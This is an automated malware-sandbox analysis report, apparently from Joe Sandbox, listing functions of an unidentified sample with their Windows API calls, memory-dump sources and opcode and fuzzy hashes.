                                                                                                                                        • Instruction ID: e486b8519e0f53a073c71616e75618b618d8eb22c2b53104ece54078c0f9f23d
                                                                                                                                        • Opcode Fuzzy Hash: e09d738e80b8d6927b41f482cb6f2f85fb0ab4c5ff507ecfdbb60964259213f2
                                                                                                                                        • Instruction Fuzzy Hash: E271ACB4901245CECF34EFAAA99C454BAA6FBB83443B4C17ED50E87362CB384546CF19
                                                                                                                                        Function 007ACC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007641A7: _fseek.LIBCMT ref: 007641BF
                                                                                                                                          • Part of subcall function 007ACE59: _wcscmp.LIBCMT ref: 007ACF49
                                                                                                                                          • Part of subcall function 007ACE59: _wcscmp.LIBCMT ref: 007ACF5C
                                                                                                                                        • _free.LIBCMT ref: 007ACDC9
                                                                                                                                        • _free.LIBCMT ref: 007ACDD0
                                                                                                                                        • _free.LIBCMT ref: 007ACE3B
                                                                                                                                          • Part of subcall function 007828CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00788715,00000000,007888A3,00784673,?), ref: 007828DE
                                                                                                                                          • Part of subcall function 007828CA: GetLastError.KERNEL32(00000000,?,00788715,00000000,007888A3,00784673,?), ref: 007828F0
                                                                                                                                        • _free.LIBCMT ref: 007ACE43
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1552873950-0
                                                                                                                                        • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                        • Instruction ID: ae7282fdb8f03135f35cf4630c6a9a05b77e5e20a86357a0597193a820b4d514
                                                                                                                                        • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                        • Instruction Fuzzy Hash: 60515AB1904218EFDF159F64CC85AAEBBB9FF49300F1000AEF619A3251DB755E808F29
                                                                                                                                        Function 00761E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00761E87
                                                                                                                                          • Part of subcall function 007638E4: _memset.LIBCMT ref: 00763965
                                                                                                                                          • Part of subcall function 007638E4: _wcscpy.LIBCMT ref: 007639B5
                                                                                                                                          • Part of subcall function 007638E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 007639C6
                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00761EDC
                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00761EEB
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D4526
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1378193009-0
                                                                                                                                        • Opcode ID: 6c1bba67f7e0d972f2357a0ef0eb8152c597ce7c4326eb9ec81d0b3705c967f2
                                                                                                                                        • Instruction ID: c03de535c932c2b626452471f702c8abb300af61bae2da686259266cd737177f
                                                                                                                                        • Opcode Fuzzy Hash: 6c1bba67f7e0d972f2357a0ef0eb8152c597ce7c4326eb9ec81d0b3705c967f2
                                                                                                                                        • Instruction Fuzzy Hash: 1121DA719047C49FEB328B24D859FEBBBFC9B05308F48408EEA9F56241C3795A85C751
                                                                                                                                        Function 007B92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007AAEA5,?,?,00000000,00000008), ref: 0077F282
                                                                                                                                          • Part of subcall function 0077F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007AAEA5,?,?,00000000,00000008), ref: 0077F2A6
                                                                                                                                        • gethostbyname.WS2_32(?), ref: 007B92F0
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B92FB
                                                                                                                                        • _memmove.LIBCMT ref: 007B9328
                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 007B9333
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1504782959-0
                                                                                                                                        • Opcode ID: 5a7cbd0ecc0322c35e34389dfcef278dfa98568b31b0756d78c4ab39a42663d5
                                                                                                                                        • Instruction ID: 37c00c8243807361f9308eb3090ff23621202e4b94509dec8376dfef4bcfc709
                                                                                                                                        • Opcode Fuzzy Hash: 5a7cbd0ecc0322c35e34389dfcef278dfa98568b31b0756d78c4ab39a42663d5
                                                                                                                                        • Instruction Fuzzy Hash: ED116075500109EFCB14FBA4CD5ADEE77B9EF08310B108025FA06A72A2DB38EE14DB61
                                                                                                                                        Function 0078010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007845EC: __FF_MSGBANNER.LIBCMT ref: 00784603
                                                                                                                                          • Part of subcall function 007845EC: __NMSG_WRITE.LIBCMT ref: 0078460A
                                                                                                                                          • Part of subcall function 007845EC: RtlAllocateHeap.NTDLL(01170000,00000000,00000001), ref: 0078462F
                                                                                                                                        • std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                          • Part of subcall function 00787495: RaiseException.KERNEL32(?,?,0076125D,00816598,?,?,?,00780158,0076125D,00816598,?,00000001), ref: 007874E6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                        • String ID: bad allocation
                                                                                                                                        • API String ID: 3902256705-2104205924
                                                                                                                                        • Opcode ID: 2cd6d5793c9ecab29a2c43b60004351e0e7ef5733851dc6256f2ba62e9fa75a4
                                                                                                                                        • Instruction ID: e3926ab78d58d8b911cbb19710c4dbc2aca533e469d5793e5037bade48b835e2
                                                                                                                                        • Opcode Fuzzy Hash: 2cd6d5793c9ecab29a2c43b60004351e0e7ef5733851dc6256f2ba62e9fa75a4
                                                                                                                                        • Instruction Fuzzy Hash: 03F0F43558820EE6C725BAA8DC0E9DE77EDAF08360F104025F905D2181DBB8CE84D3E5
                                                                                                                                        Function 007BF79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8436cc7e6a19b895e377732bb5bc669903379a47ff06e304c3fcb0b75d781b00
                                                                                                                                        • Instruction ID: 80291ab460bd4272fc932292e7f4afe36801e641517123b196d1a02e9f32f7b4
                                                                                                                                        • Opcode Fuzzy Hash: 8436cc7e6a19b895e377732bb5bc669903379a47ff06e304c3fcb0b75d781b00
                                                                                                                                        • Instruction Fuzzy Hash: A3F17C71604701DFC714DF28C884B9ABBE5FF89714F10892DF9999B292D738E945CB82
                                                                                                                                        Function 0076C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0076C00E,?,?,?,?,00000010), ref: 0076C627
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0076C65F
                                                                                                                                        • _memmove.LIBCMT ref: 0076C697
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3033907384-0
                                                                                                                                        • Opcode ID: 68e51fd34ce3f761111fde456a7cc82e2440c203941dac0691dd001e1f44ad39
                                                                                                                                        • Instruction ID: cbd3731e9a1c2b4f8a5d502b915f289ffd3e4b843a18e152eb637da62a22d277
                                                                                                                                        • Opcode Fuzzy Hash: 68e51fd34ce3f761111fde456a7cc82e2440c203941dac0691dd001e1f44ad39
                                                                                                                                        • Instruction Fuzzy Hash: F5310BB1641201AFD765AB34D84AB2BB7D9EF44310F14453AFC5BCB290EA36E8108791
                                                                                                                                        Function 007845EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00784603
                                                                                                                                          • Part of subcall function 00788E52: __NMSG_WRITE.LIBCMT ref: 00788E79
                                                                                                                                          • Part of subcall function 00788E52: __NMSG_WRITE.LIBCMT ref: 00788E83
                                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 0078460A
                                                                                                                                          • Part of subcall function 00788EB2: GetModuleFileNameW.KERNEL32(00000000,00820312,00000104,?,00000001,00780127), ref: 00788F44
                                                                                                                                          • Part of subcall function 00788EB2: ___crtMessageBoxW.LIBCMT ref: 00788FF2
                                                                                                                                          • Part of subcall function 00781D65: ___crtCorExitProcess.LIBCMT ref: 00781D6B
                                                                                                                                          • Part of subcall function 00781D65: ExitProcess.KERNEL32 ref: 00781D74
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        • RtlAllocateHeap.NTDLL(01170000,00000000,00000001), ref: 0078462F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1372826849-0
                                                                                                                                        • Opcode ID: fedd44a003e4271826c9682fac96e7ce05675db0a0cd2f803ef5ac857890b025
                                                                                                                                        • Instruction ID: 69a3dc3a9254095c5ea2ece29d88e35e63cad40298279ce139a3bbfe6847f1e1
                                                                                                                                        • Opcode Fuzzy Hash: fedd44a003e4271826c9682fac96e7ce05675db0a0cd2f803ef5ac857890b025
                                                                                                                                        • Instruction Fuzzy Hash: 9C0192317C1312EBE6203B74AC46A2A2758AB82761F510126F505DB182EFFC9C418B66
                                                                                                                                        Function 0076E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • TranslateMessage.USER32(?), ref: 0076E646
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0076E651
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076E664
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4217535847-0
                                                                                                                                        • Opcode ID: 0ac9ea0e2906b80f1cb9c07385537056d1fd520f5db469f675c798b0b4643fed
                                                                                                                                        • Instruction ID: 2934970b66c0586d127fd8f16b56a195ca54ffacf06f103bbec25da6aa9aae0b
                                                                                                                                        • Opcode Fuzzy Hash: 0ac9ea0e2906b80f1cb9c07385537056d1fd520f5db469f675c798b0b4643fed
                                                                                                                                        • Instruction Fuzzy Hash: 88F012756043459BDB20D6E0CD89B6BB7DDBB98780F148C3DFA46C6180E7B8D4048722
                                                                                                                                        Function 007AC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 007AC45E
                                                                                                                                          • Part of subcall function 007828CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00788715,00000000,007888A3,00784673,?), ref: 007828DE
                                                                                                                                          • Part of subcall function 007828CA: GetLastError.KERNEL32(00000000,?,00788715,00000000,007888A3,00784673,?), ref: 007828F0
                                                                                                                                        • _free.LIBCMT ref: 007AC46F
                                                                                                                                        • _free.LIBCMT ref: 007AC481
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                        • Instruction ID: e7be21f4571569ac0a248845b2f0c853f5d748c0e3e0377eb7896f0a4da7ebe2
                                                                                                                                        • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                        • Instruction Fuzzy Hash: 39E017B1600741E6CE64BA79A859BB367CC6F49762B14492EF449D7183DF2CE8418638
                                                                                                                                        Function 0077058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CALL
                                                                                                                                        • API String ID: 0-4196123274
                                                                                                                                        • Opcode ID: 3574c6e73dddaa5d0e12b66f3c00a18388485b3bfaa498ff64bb77234817d7cc
                                                                                                                                        • Instruction ID: c32f4d85c55c87b5935830680327e83cddb3c4e7b3c320420f0293fc0c99b826
                                                                                                                                        • Opcode Fuzzy Hash: 3574c6e73dddaa5d0e12b66f3c00a18388485b3bfaa498ff64bb77234817d7cc
                                                                                                                                        • Instruction Fuzzy Hash: 04225C70608341DFDB24DF24C498A2AB7E1FF85344F15896DE99A8B362D739EC45CB82
                                                                                                                                        Function 00764010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: EA06
                                                                                                                                        • API String ID: 4104443479-3962188686
                                                                                                                                        • Opcode ID: c10e7730a05e75f809a2efde7f114c146e69e55032fb6f27fc664f750bf80552
                                                                                                                                        • Instruction ID: 1d950988475afece255fa233647027a174c193dfe59687f5904f3c851cdd6f99
                                                                                                                                        • Opcode Fuzzy Hash: c10e7730a05e75f809a2efde7f114c146e69e55032fb6f27fc664f750bf80552
                                                                                                                                        • Instruction Fuzzy Hash: 91419D61A0416CDBCF259B648C557BF7FA69F56300F2844A5EE83EB282C63D8DC087A1
                                                                                                                                        Function 007B013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscmp
                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                        • API String ID: 856254489-3771769585
                                                                                                                                        • Opcode ID: 7f771d22a401608d824064b6d8dfecf8b679202b45832805e2e0977803a783e6
                                                                                                                                        • Instruction ID: b9fc6fca2d787f9ea85ece2f012b010fdd5a617ab31c37f5e684a50128ee0d9f
                                                                                                                                        • Opcode Fuzzy Hash: 7f771d22a401608d824064b6d8dfecf8b679202b45832805e2e0977803a783e6
                                                                                                                                        • Instruction Fuzzy Hash: A911A77560020CDFCB18EF58C995EAEB3A9BF85710B148059FA06AF395DA78ED41C7E0
                                                                                                                                        Function 00763BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007D3CF1
                                                                                                                                          • Part of subcall function 007631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007631DA
                                                                                                                                          • Part of subcall function 00763A67: SHGetMalloc.SHELL32(1<v), ref: 00763A7D
                                                                                                                                          • Part of subcall function 00763A67: SHGetDesktopFolder.SHELL32(?), ref: 00763A8F
                                                                                                                                          • Part of subcall function 00763A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00763AD2
